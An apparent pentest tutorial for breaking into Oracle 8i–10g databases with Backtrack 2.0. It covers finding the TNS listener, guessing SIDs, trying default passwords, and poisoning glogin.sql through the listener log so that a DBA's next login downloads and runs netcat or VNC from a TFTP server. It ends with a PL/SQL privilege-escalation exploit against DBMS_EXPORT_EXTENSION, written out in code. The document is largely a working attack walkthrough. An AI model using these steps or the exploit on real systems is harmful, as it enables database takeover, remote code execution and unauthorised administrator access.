10a
& Oracle
The following short tutorial explains how to do a (limited) pentest against Oracle (8.1.7.4 –
10.2.0.2). This tutorial will be extended in the future…
The following tutorial explains how to do an Oracle pentest with Backtrack 2.0. I want to
thank the entire Backtrack-Team for this great collection of security tools and Max for the
collaboration.
Nowadays there are many Oracle 10g databases around. Oracle did a good job (but not a
perfect) hardening the database out of the box. Most tutorials still describe how to break older
8i/9i databases. Most of the older tools are not working against the new 10g listener. We will
show how to connect to an Oracle database, decrypt Oracle passwords, hack the TNS listener
and escalate privileges.
At a glance:
1. Find the Oracle database + port of the listener (with nmap/amap)
nmap –v <IP-ADDRESS>
We can use nmap or amap to identify the port where the TNS listener is running. Both tools
are installed on the Backtrack CD.
nmap –v <IP-ADDRESS>
Sample: Oracle 9i
Get SID/Servicename
In Oracle 7- 9i Rel. 2 the listener always returned the SID/Servicename of the registered
Oracle databases via the listener status command. Since Patchset 9.2.0.6 (with password-
protection) or in Oracle 10g the listener does no longer return these values.
The name of the SID/Service_name is mandatory for connecting to the database via OCI.
Without the knowledge of the SID it is not possible to connect to Oracle.
In unprotected 8i/9i environments the easiest way to get this information is the status
command. This status command returns a lot of useful information like version number, OS,
installation patch, SID, port, …
Now we know:
Version: 9.2.0.1
Operating System: Windows
Oracle_Home: c:\oracle\ora92
Extproc installed: YES
Ports: 1521 (TNS), 2100 (FTP), 8080 (HTTP)
SID: ora9201
Now we know that the SID is ora9201. We can use this value to connect to the Oracle
database using sqlplus or checkpwd.
If the Oracle 9i Listener is password protected we are getting the following error message
from the status command
In case of an Oracle 10g database (protected with local OS authentication) we are getting a
different error message from the status command
For security reasons Oracle is blocking status requests from external IP addresses in Oracle
10g or password protected 9i databases. In this case we can try to bruteforce / or dictionary
attack the SID by using sidguess
Now we know that the SID of this database is XE and we have all the information which is
necessary to connect to the database. OK, we still need an Oracle account.
sqlplus user/password@//<IP_ADDRESS>:<PORT>/<SID>
At the prompt we can run all SQL commands (according to our privileges)
checkpwd system/alexora1@//192.168.2.232/ora9201
default_passwords.txt
Oracle 10g
In Oracle 10g (with listener OS authentication), the listener returns an error message.
checkpwd system/alexora1@//192.168.2.234/xe
default_passwords.txt
Now we are copying an executable for the target platform (e.g. vncserver.exe, netcat ) into the
directory /tmp.
Now we must get the path of the ORACLE_HOME via the (unprotected) TNS Listener
The next step is to change the name and directory of the logfile, e.g.
c:\oracle\ora92\sqlplus\admin\glogin.sql.
Instead of modifying the glogin.sql it is also possible to put content into the .rhosts (a
security aware DBA should NEVER run R*-Services on a Unix-Server) or we could upload
authorized keys for SSH. This is not shown here.
Now we are writing OS commands (download and execute binary from TFTP server) and
SQL commands to the listener log file:
Now we are changing the value of the listener.log back to the original value
The next time the DBA is using sqlplus on the database server, the code in the glogin.sql is
executed, vnserver.exe (or netcat) is downloaded and executed.
Now we use vnc to connect to the client. Or we can connect with out newly created user
backtrack20 to connect to the database.
GAME OVER –
Server 0wned.
Privilege Escalation
There are various ways to do a privilege escalation.
In the beginning we must connect to the database with a user with create procedure privileges.
As we can see we do not have DBA privileges (“desc dba_users”).
sqlplus scott/tiger@//192.168.2.238/ora9207
-- Create a function in a package first and inject this function. The function will be executed
as user SYS.
CREATE OR REPLACE
PACKAGE BT20_EXPLOIT AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SCOTT';
TYPE_NAME := 'BT20_EXPLOIT';
TYPE_SCHEMA := 'SCOTT';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return :=
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
Now we must logout and login again. After that we are DBA (if the system was not patched
or updated to the latest version).